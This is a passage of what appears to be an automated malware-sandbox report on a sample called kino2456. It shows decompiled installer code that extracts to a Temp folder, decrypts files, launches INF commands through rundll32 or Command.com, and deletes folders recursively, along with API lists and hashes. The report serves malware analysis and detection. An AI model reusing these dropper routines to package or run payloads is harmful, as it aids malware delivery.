                                                                                                                                                                                                                                    • GetFileAttributesA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,?,00000000,00000001,00000000), ref: 00961BFE
                                                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000200,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,?,00000000,00000001,00000000), ref: 00961C57
                                                                                                                                                                                                                                    • GetPrivateProfileIntA.KERNEL32 ref: 00961C88
                                                                                                                                                                                                                                    • GetPrivateProfileStringA.KERNEL32(Version,AdvancedINF,00961140,00000000,00000008,?), ref: 00961CB8
                                                                                                                                                                                                                                    • GetShortPathNameA.KERNEL32 ref: 00961D1B
                                                                                                                                                                                                                                      • Part of subcall function 009644B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00964518
                                                                                                                                                                                                                                      • Part of subcall function 009644B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 00964554
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, Offset: 00960000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430432662.0000000000960000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430498862.0000000000968000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_960000_kino2456.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
                                                                                                                                                                                                                                    • String ID: "$.BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP002.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
                                                                                                                                                                                                                                    • API String ID: 383838535-2112662285
                                                                                                                                                                                                                                    • Opcode ID: 9ce3cb5805c69d3706e461401140c1662a145bd9e0e44ac4bde2c1adfc2aae5c
                                                                                                                                                                                                                                    • Instruction ID: 605ad669d2f943ae4d9f808b344d91f39766ba106d431dc12a34c9cb5c6b7caa
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9ce3cb5805c69d3706e461401140c1662a145bd9e0e44ac4bde2c1adfc2aae5c
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 27A169B0A082186BEB30DB24CC45FEA77ADDB92314F1C0699F595E32D0DBB59E85CB50
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 00962F1D Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 120libraryfileloaderCOMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 406 962f1d-962f3d 407 962f3f-962f46 406->407 408 962f6c-962f73 call 965164 406->408 409 962f5f-962f66 call 963a3f 407->409 410 962f48 call 9651e5 407->410 415 963041 408->415 416 962f79-962f80 call 9655a0 408->416 409->408 409->415 417 962f4d-962f4f 410->417 420 963043-963053 call 966ce0 415->420 416->415 424 962f86-962fbe GetSystemDirectoryA call 96658a LoadLibraryA 416->424 417->415 421 962f55-962f5d 417->421 421->408 421->409 428 962ff7-963004 FreeLibrary 424->428 429 962fc0-962fd4 GetProcAddress 424->429 431 963006-96300c 428->431 432 963017-963024 SetCurrentDirectoryA 428->432 429->428 430 962fd6-962fee DecryptFileA 429->430 430->428 442 962ff0-962ff5 430->442 431->432 435 96300e call 96621e 431->435 433 963026-96303c call 9644b9 call 966285 432->433 434 963054-96305a 432->434 433->415 438 963065-96306c 434->438 439 96305c call 963b26 434->439 446 963013-963015 435->446 444 96306e-963075 call 96256d 438->444 445 96307c-963089 438->445 451 963061-963063 439->451 442->428 452 96307a 444->452 448 9630a1-9630a9 445->448 449 96308b-963091 445->449 446->415 446->432 455 9630b4-9630b7 448->455 456 9630ab-9630ad 448->456 449->448 453 963093 call 963ba2 449->453 451->415 451->438 452->445 459 963098-96309a 453->459 455->420 456->455 458 9630af call 964169 456->458 458->455 459->415 461 96309c 459->461 461->448
                                                                                                                                                                                                                                    C-Code - Quality: 82%
                                                                                                                                                                                                                                    			E00962F1D(void* __ecx, int __edx) {
				signed int _v8;
				char _v272;
				_Unknown_base(*)()* _v276;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t9;
				void* _t11;
				struct HWND__* _t12;
				void* _t14;
				int _t21;
				signed int _t22;
				signed int _t25;
				intOrPtr* _t26;
				signed int _t27;
				void* _t30;
				_Unknown_base(*)()* _t31;
				void* _t34;
				struct HINSTANCE__* _t36;
				intOrPtr _t41;
				intOrPtr* _t44;
				signed int _t46;
				int _t47;
				void* _t58;
				void* _t59;

				_t43 = __edx;
				_t9 =  *0x968004; // 0xf4cc89a0
				_v8 = _t9 ^ _t46;
				if( *0x968a38 != 0) {
					L5:
					_t11 = E00965164(_t52);
					_t53 = _t11;
					if(_t11 == 0) {
						L16:
						_t12 = 0;
						L17:
						return E00966CE0(_t12, _t36, _v8 ^ _t46, _t43, _t44, _t45);
					}
					_t14 = E009655A0(_t53); // executed
					if(_t14 == 0) {
						goto L16;
					} else {
						_t45 = 0x105;
						GetSystemDirectoryA( &_v272, 0x105);
						_t43 = 0x105;
						_t40 =  &_v272;
						E0096658A( &_v272, 0x105, "advapi32.dll");
						_t36 = LoadLibraryA( &_v272);
						_t44 = 0;
						if(_t36 != 0) {
							_t31 = GetProcAddress(_t36, "DecryptFileA");
							_v276 = _t31;
							if(_t31 != 0) {
								_t45 = _t47;
								_t40 = _t31;
								 *0x96a288("C:\Users\hardz\AppData\Local\Temp\IXP002.TMP\", 0); // executed
								_v276();
								if(_t47 != _t47) {
									_t40 = 4;
									asm("int 0x29");
								}
							}
						}
						FreeLibrary(_t36);
						_t58 =  *0x968a24 - _t44; // 0x0
						if(_t58 != 0) {
							L14:
							_t21 = SetCurrentDirectoryA("C:\Users\hardz\AppData\Local\Temp\IXP002.TMP\"); // executed
							if(_t21 != 0) {
								__eflags =  *0x968a2c - _t44; // 0x0
								if(__eflags != 0) {
									L20:
									__eflags =  *0x968d48 & 0x000000c0;
									if(( *0x968d48 & 0x000000c0) == 0) {
										_t41 =  *0x969a40; // 0x3, executed
										_t26 = E0096256D(_t41); // executed
										_t44 = _t26;
									}
									_t22 =  *0x968a24; // 0x0
									 *0x969a44 = _t44;
									__eflags = _t22;
									if(_t22 != 0) {
										L26:
										__eflags =  *0x968a38;
										if( *0x968a38 == 0) {
											__eflags = _t22;
											if(__eflags == 0) {
												E00964169(__eflags);
											}
										}
										_t12 = 1;
										goto L17;
									} else {
										__eflags =  *0x969a30 - _t22; // 0x0
										if(__eflags != 0) {
											goto L26;
										}
										_t25 = E00963BA2(); // executed
										__eflags = _t25;
										if(_t25 == 0) {
											goto L16;
										}
										_t22 =  *0x968a24; // 0x0
										goto L26;
									}
								}
								_t27 = E00963B26(_t40, _t44);
								__eflags = _t27;
								if(_t27 == 0) {
									goto L16;
								}
								goto L20;
							}
							_t43 = 0x4bc;
							E009644B9(0, 0x4bc, _t44, _t44, 0x10, _t44);
							 *0x969124 = E00966285();
							goto L16;
						}
						_t59 =  *0x969a30 - _t44; // 0x0
						if(_t59 != 0) {
							goto L14;
						}
						_t30 = E0096621E(); // executed
						if(_t30 == 0) {
							goto L16;
						}
						goto L14;
					}
				}
				_t49 =  *0x968a24;
				if( *0x968a24 != 0) {
					L4:
					_t34 = E00963A3F(_t51);
					_t52 = _t34;
					if(_t34 == 0) {
						goto L16;
					}
					goto L5;
				}
				if(E009651E5(_t49) == 0) {
					goto L16;
				}
				_t51 =  *0x968a38;
				if( *0x968a38 != 0) {
					goto L5;
				}
				goto L4;
			}




























                                                                                                                                                                                                                                    0x00962f1d
                                                                                                                                                                                                                                    0x00962f28
                                                                                                                                                                                                                                    0x00962f2f
                                                                                                                                                                                                                                    0x00962f3d
                                                                                                                                                                                                                                    0x00962f6c
                                                                                                                                                                                                                                    0x00962f6c
                                                                                                                                                                                                                                    0x00962f71
                                                                                                                                                                                                                                    0x00962f73
                                                                                                                                                                                                                                    0x00963041
                                                                                                                                                                                                                                    0x00963041
                                                                                                                                                                                                                                    0x00963043
                                                                                                                                                                                                                                    0x00963053
                                                                                                                                                                                                                                    0x00963053
                                                                                                                                                                                                                                    0x00962f79
                                                                                                                                                                                                                                    0x00962f80
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00962f86
                                                                                                                                                                                                                                    0x00962f86
                                                                                                                                                                                                                                    0x00962f93
                                                                                                                                                                                                                                    0x00962f9e
                                                                                                                                                                                                                                    0x00962fa0
                                                                                                                                                                                                                                    0x00962fa6
                                                                                                                                                                                                                                    0x00962fb8
                                                                                                                                                                                                                                    0x00962fba
                                                                                                                                                                                                                                    0x00962fbe
                                                                                                                                                                                                                                    0x00962fc6
                                                                                                                                                                                                                                    0x00962fcc
                                                                                                                                                                                                                                    0x00962fd4
                                                                                                                                                                                                                                    0x00962fd6
                                                                                                                                                                                                                                    0x00962fd8
                                                                                                                                                                                                                                    0x00962fe0
                                                                                                                                                                                                                                    0x00962fe6
                                                                                                                                                                                                                                    0x00962fee
                                                                                                                                                                                                                                    0x00962ff0
                                                                                                                                                                                                                                    0x00962ff5
                                                                                                                                                                                                                                    0x00962ff5
                                                                                                                                                                                                                                    0x00962fee
                                                                                                                                                                                                                                    0x00962fd4
                                                                                                                                                                                                                                    0x00962ff8
                                                                                                                                                                                                                                    0x00962ffe
                                                                                                                                                                                                                                    0x00963004
                                                                                                                                                                                                                                    0x00963017
                                                                                                                                                                                                                                    0x0096301c
                                                                                                                                                                                                                                    0x00963024
                                                                                                                                                                                                                                    0x00963054
                                                                                                                                                                                                                                    0x0096305a
                                                                                                                                                                                                                                    0x00963065
                                                                                                                                                                                                                                    0x00963065
                                                                                                                                                                                                                                    0x0096306c
                                                                                                                                                                                                                                    0x0096306e
                                                                                                                                                                                                                                    0x00963075
                                                                                                                                                                                                                                    0x0096307a
                                                                                                                                                                                                                                    0x0096307a
                                                                                                                                                                                                                                    0x0096307c
                                                                                                                                                                                                                                    0x00963081
                                                                                                                                                                                                                                    0x00963087
                                                                                                                                                                                                                                    0x00963089
                                                                                                                                                                                                                                    0x009630a1
                                                                                                                                                                                                                                    0x009630a1
                                                                                                                                                                                                                                    0x009630a9
                                                                                                                                                                                                                                    0x009630ab
                                                                                                                                                                                                                                    0x009630ad
                                                                                                                                                                                                                                    0x009630af
                                                                                                                                                                                                                                    0x009630af
                                                                                                                                                                                                                                    0x009630ad
                                                                                                                                                                                                                                    0x009630b6
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0096308b
                                                                                                                                                                                                                                    0x0096308b
                                                                                                                                                                                                                                    0x00963091
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00963093
                                                                                                                                                                                                                                    0x00963098
                                                                                                                                                                                                                                    0x0096309a
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0096309c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0096309c
                                                                                                                                                                                                                                    0x00963089
                                                                                                                                                                                                                                    0x0096305c
                                                                                                                                                                                                                                    0x00963061
                                                                                                                                                                                                                                    0x00963063
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00963063
                                                                                                                                                                                                                                    0x0096302b
                                                                                                                                                                                                                                    0x00963032
                                                                                                                                                                                                                                    0x0096303c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0096303c
                                                                                                                                                                                                                                    0x00963006
                                                                                                                                                                                                                                    0x0096300c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0096300e
                                                                                                                                                                                                                                    0x00963015
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00963015
                                                                                                                                                                                                                                    0x00962f80
                                                                                                                                                                                                                                    0x00962f3f
                                                                                                                                                                                                                                    0x00962f46
                                                                                                                                                                                                                                    0x00962f5f
                                                                                                                                                                                                                                    0x00962f5f
                                                                                                                                                                                                                                    0x00962f64
                                                                                                                                                                                                                                    0x00962f66
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00962f66
                                                                                                                                                                                                                                    0x00962f4f
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00962f55
                                                                                                                                                                                                                                    0x00962f5d
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetSystemDirectoryA.KERNEL32 ref: 00962F93
                                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(?,advapi32.dll), ref: 00962FB2
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 00962FC6
                                                                                                                                                                                                                                    • DecryptFileA.ADVAPI32 ref: 00962FE6
                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00962FF8
                                                                                                                                                                                                                                    • SetCurrentDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 0096301C
                                                                                                                                                                                                                                      • Part of subcall function 009651E5: LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00962F4D,?,00000002,00000000), ref: 00965201
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, Offset: 00960000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430432662.0000000000960000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430498862.0000000000968000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_960000_kino2456.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: DirectoryLibrary$AddressAllocCurrentDecryptFileFreeLoadLocalProcSystem
                                                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$DecryptFileA$advapi32.dll
                                                                                                                                                                                                                                    • API String ID: 2126469477-1002207402
                                                                                                                                                                                                                                    • Opcode ID: 1b2f63dc2a77d5b5ba742c9f217493770f80810443e8aec4f5ffab71e5066996
                                                                                                                                                                                                                                    • Instruction ID: 2bcd7b837847c2f46c4364cdb9f4db958176c8f7421eac14e5282d4c26f95f9b
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1b2f63dc2a77d5b5ba742c9f217493770f80810443e8aec4f5ffab71e5066996
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CE411A30A246059BDB30ABB19D5576733FCDB95750F10812EED41D2192EFB4CE88EB61
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 00962390 Relevance: 12.1, APIs: 8, Instructions: 93filestringCOMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    C-Code - Quality: 86%
                                                                                                                                                                                                                                    			E00962390(CHAR* __ecx) {
				signed int _v8;
				char _v276;
				char _v280;
				char _v284;
				struct _WIN32_FIND_DATAA _v596;
				struct _WIN32_FIND_DATAA _v604;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t21;
				int _t36;
				void* _t46;
				void* _t62;
				void* _t63;
				CHAR* _t65;
				void* _t66;
				signed int _t67;
				signed int _t69;

				_t69 = (_t67 & 0xfffffff8) - 0x254;
				_t21 =  *0x968004; // 0xf4cc89a0
				_t22 = _t21 ^ _t69;
				_v8 = _t21 ^ _t69;
				_t65 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx)) == 0) {
					L10:
					_pop(_t62);
					_pop(_t66);
					_pop(_t46);
					return E00966CE0(_t22, _t46, _v8 ^ _t69, _t58, _t62, _t66);
				} else {
					E00961680( &_v276, 0x104, __ecx);
					_t58 = 0x104;
					E009616B3( &_v280, 0x104, "*");
					_t22 = FindFirstFileA( &_v284,  &_v604); // executed
					_t63 = _t22;
					if(_t63 == 0xffffffff) {
						goto L10;
					} else {
						goto L3;
					}
					do {
						L3:
						_t58 = 0x104;
						E00961680( &_v276, 0x104, _t65);
						if((_v604.ftCreationTime & 0x00000010) == 0) {
							_t58 = 0x104;
							E009616B3( &_v276, 0x104,  &(_v596.dwReserved1));
							SetFileAttributesA( &_v280, 0x80);
							DeleteFileA( &_v280);
						} else {
							if(lstrcmpA( &(_v596.dwReserved1), ".") != 0 && lstrcmpA( &(_v596.cFileName), "..") != 0) {
								E009616B3( &_v276, 0x104,  &(_v596.cFileName));
								_t58 = 0x104;
								E0096658A( &_v280, 0x104, 0x961140);
								E00962390( &_v284);
							}
						}
						_t36 = FindNextFileA(_t63,  &_v596); // executed
					} while (_t36 != 0);
					FindClose(_t63); // executed
					_t22 = RemoveDirectoryA(_t65); // executed
					goto L10;
				}
			}





















                                                                                                                                                                                                                                    0x00962398
                                                                                                                                                                                                                                    0x0096239e
                                                                                                                                                                                                                                    0x009623a3
                                                                                                                                                                                                                                    0x009623a5
                                                                                                                                                                                                                                    0x009623ae
                                                                                                                                                                                                                                    0x009623b3
                                                                                                                                                                                                                                    0x009624cb
                                                                                                                                                                                                                                    0x009624d2
                                                                                                                                                                                                                                    0x009624d3
                                                                                                                                                                                                                                    0x009624d4
                                                                                                                                                                                                                                    0x009624df
                                                                                                                                                                                                                                    0x009623c2
                                                                                                                                                                                                                                    0x009623d1
                                                                                                                                                                                                                                    0x009623db
                                                                                                                                                                                                                                    0x009623e4
                                                                                                                                                                                                                                    0x009623f6
                                                                                                                                                                                                                                    0x009623fc
                                                                                                                                                                                                                                    0x00962401
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00962407
                                                                                                                                                                                                                                    0x00962407
                                                                                                                                                                                                                                    0x00962408
                                                                                                                                                                                                                                    0x00962411
                                                                                                                                                                                                                                    0x0096241f
                                                                                                                                                                                                                                    0x0096247a
                                                                                                                                                                                                                                    0x00962483
                                                                                                                                                                                                                                    0x00962495
                                                                                                                                                                                                                                    0x009624a3
                                                                                                                                                                                                                                    0x00962421
                                                                                                                                                                                                                                    0x0096242f
                                                                                                                                                                                                                                    0x00962453
                                                                                                                                                                                                                                    0x0096245d
                                                                                                                                                                                                                                    0x00962466
                                                                                                                                                                                                                                    0x00962472
                                                                                                                                                                                                                                    0x00962472
                                                                                                                                                                                                                                    0x0096242f
                                                                                                                                                                                                                                    0x009624af
                                                                                                                                                                                                                                    0x009624b5
                                                                                                                                                                                                                                    0x009624be
                                                                                                                                                                                                                                    0x009624c5
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x009624c5

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • FindFirstFileA.KERNELBASE(?,00968A3A,009611F4,00968A3A,00000000,?,?), ref: 009623F6
                                                                                                                                                                                                                                    • lstrcmpA.KERNEL32(?,009611F8), ref: 00962427
                                                                                                                                                                                                                                    • lstrcmpA.KERNEL32(?,009611FC), ref: 0096243B
                                                                                                                                                                                                                                    • SetFileAttributesA.KERNEL32(?,00000080,?), ref: 00962495
                                                                                                                                                                                                                                    • DeleteFileA.KERNEL32(?), ref: 009624A3
                                                                                                                                                                                                                                    • FindNextFileA.KERNELBASE(00000000,00000010), ref: 009624AF
                                                                                                                                                                                                                                    • FindClose.KERNELBASE(00000000), ref: 009624BE
                                                                                                                                                                                                                                    • RemoveDirectoryA.KERNELBASE(00968A3A), ref: 009624C5
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, Offset: 00960000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430432662.0000000000960000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430498862.0000000000968000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_960000_kino2456.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 836429354-0
                                                                                                                                                                                                                                    • Opcode ID: dc4c99106fffbfba0d093302b2ab0276f7fa21125946b31f4422f4cfdc1659f1
                                                                                                                                                                                                                                    • Instruction ID: 4ab539a8864e36842d984bfcf33db646219862921c1956c8b7dd890d76112424
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dc4c99106fffbfba0d093302b2ab0276f7fa21125946b31f4422f4cfdc1659f1
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 36317531618B40ABC320EB64DC89BEB73ECAFC5315F04492EF59596290EF74994DCB52
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 00962BFB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 63libraryloaderCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 70%
                                                                                                                                                                                                                                    			E00962BFB(struct HINSTANCE__* _a4, intOrPtr _a12) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t4;
				void* _t6;
				intOrPtr _t7;
				void* _t9;
				struct HINSTANCE__* _t12;
				intOrPtr* _t17;
				signed char _t19;
				intOrPtr* _t21;
				void* _t22;
				void* _t24;
				intOrPtr _t32;

				_t4 = GetVersion();
				if(_t4 >= 0 && _t4 >= 6) {
					_t12 = GetModuleHandleW(L"Kernel32.dll");
					if(_t12 != 0) {
						_t21 = GetProcAddress(_t12, "HeapSetInformation");
						if(_t21 != 0) {
							_t17 = _t21;
							 *0x96a288(0, 1, 0, 0);
							 *_t21();
							_t29 = _t24 - _t24;
							if(_t24 != _t24) {
								_t17 = 4;
								asm("int 0x29");
							}
						}
					}
				}
				_t20 = _a12;
				_t18 = _a4;
				 *0x969124 = 0;
				if(E00962CAA(_a4, _a12, _t29, _t17) != 0) {
					_t9 = E00962F1D(_t18, _t20); // executed
					_t22 = _t9; // executed
					E009652B6(0, _t18, _t21, _t22); // executed
					if(_t22 != 0) {
						_t32 =  *0x968a3a; // 0x0
						if(_t32 == 0) {
							_t19 =  *0x969a2c; // 0x0
							if((_t19 & 0x00000001) != 0) {
								E00961F90(_t19, _t21, _t22);
							}
						}
					}
				}
				_t6 =  *0x968588; // 0x0
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0x969124; // 0x0
				return _t7;
			}


















                                                                                                                                                                                                                                    0x00962c03
                                                                                                                                                                                                                                    0x00962c0d
                                                                                                                                                                                                                                    0x00962c18
                                                                                                                                                                                                                                    0x00962c20
                                                                                                                                                                                                                                    0x00962c2e
                                                                                                                                                                                                                                    0x00962c32
                                                                                                                                                                                                                                    0x00962c36
                                                                                                                                                                                                                                    0x00962c3d
                                                                                                                                                                                                                                    0x00962c43
                                                                                                                                                                                                                                    0x00962c45
                                                                                                                                                                                                                                    0x00962c47
                                                                                                                                                                                                                                    0x00962c49
                                                                                                                                                                                                                                    0x00962c4e
                                                                                                                                                                                                                                    0x00962c4e
                                                                                                                                                                                                                                    0x00962c47
                                                                                                                                                                                                                                    0x00962c32
                                                                                                                                                                                                                                    0x00962c20
                                                                                                                                                                                                                                    0x00962c50
                                                                                                                                                                                                                                    0x00962c54
                                                                                                                                                                                                                                    0x00962c57
                                                                                                                                                                                                                                    0x00962c64
                                                                                                                                                                                                                                    0x00962c66
                                                                                                                                                                                                                                    0x00962c6b
                                                                                                                                                                                                                                    0x00962c6d
                                                                                                                                                                                                                                    0x00962c74
                                                                                                                                                                                                                                    0x00962c76
                                                                                                                                                                                                                                    0x00962c7c
                                                                                                                                                                                                                                    0x00962c7e
                                                                                                                                                                                                                                    0x00962c87
                                                                                                                                                                                                                                    0x00962c89
                                                                                                                                                                                                                                    0x00962c89
                                                                                                                                                                                                                                    0x00962c87
                                                                                                                                                                                                                                    0x00962c7c
                                                                                                                                                                                                                                    0x00962c74
                                                                                                                                                                                                                                    0x00962c8e
                                                                                                                                                                                                                                    0x00962c95
                                                                                                                                                                                                                                    0x00962c98
                                                                                                                                                                                                                                    0x00962c98
                                                                                                                                                                                                                                    0x00962c9e
                                                                                                                                                                                                                                    0x00962ca7

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetVersion.KERNEL32(?,00000002,00000000,?,00966BB0,00960000,00000000,00000002,0000000A), ref: 00962C03
                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(Kernel32.dll,?,00966BB0,00960000,00000000,00000002,0000000A), ref: 00962C18
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 00962C28
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,00966BB0,00960000,00000000,00000002,0000000A), ref: 00962C98
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, Offset: 00960000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430432662.0000000000960000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430498862.0000000000968000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_960000_kino2456.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Handle$AddressCloseModuleProcVersion
                                                                                                                                                                                                                                    • String ID: HeapSetInformation$Kernel32.dll
                                                                                                                                                                                                                                    • API String ID: 62482547-3460614246
                                                                                                                                                                                                                                    • Opcode ID: 534fc4d9f5ee343ea3e937723adc7695602e085ba0ba8613ed6d9f14a48b585f
                                                                                                                                                                                                                                    • Instruction ID: 3f65d1220cd3b3391d91e6dbdee6f1c71883c33f69ecf1124f2d30d4ed65352d
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 534fc4d9f5ee343ea3e937723adc7695602e085ba0ba8613ed6d9f14a48b585f
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E0116B31218B055BCB207BB5AC98B2F3B5DDBC4398B09005DFC80F3250CAB8DC41EAA1
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 00966F40 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E00966F40() {

				SetUnhandledExceptionFilter(E00966EF0); // executed
				return 0;
			}



                                                                                                                                                                                                                                    0x00966f45
                                                                                                                                                                                                                                    0x00966f4d

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNELBASE(Function_00006EF0), ref: 00966F45
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, Offset: 00960000, based on PE: true
